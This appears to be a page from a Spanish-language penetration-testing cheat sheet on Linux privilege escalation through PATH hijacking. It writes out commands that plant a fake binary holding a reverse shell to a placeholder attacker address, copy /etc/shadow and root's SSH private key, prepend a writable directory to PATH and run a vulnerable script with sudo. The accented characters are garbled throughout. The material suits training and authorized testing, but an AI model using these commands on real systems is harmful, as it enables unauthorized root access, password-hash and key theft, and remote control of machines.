PATH Variable

Creaci贸n de directorio de trabajo.

cd ~
mkdir temp
cd temp

Creaci贸n de binario que suplantar谩 el binario original y asignaci贸n de sus privilegios.

# opci贸n 1: shell
echo "/bin/bash" > <binary>
echo "/bin/bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<port> 0>&1'" > <binary>
# opci贸n 2: lectura de archivo
echo "/bin/bash -c 'cat /<path>/<file> > /home/<user>/temp/<file>'" > <binary>
echo "/bin/bash -c 'cat /etc/shadow > /home/<user>/temp/shadow'" > <binary>
echo "/bin/bash -c 'cat /root/.ssh/id_rsa > /home/<user>/temp/id_rsa'" > <binary>
# asignaci贸n de privilegios al binario
chmod 777 <binary>

Incorporaci贸n de ruta a variable PATH.

echo $PATH
export PATH=/home/<user>/temp:$PATH
echo $PATH

Ejecuci贸n de script o binario vulnerable.

sudo /<path>/<script>
sudo /<path>/<binary>
AnteriorHerramientas automatizadasSiguientePython Library Hijacking

脷ltima actualizaci贸n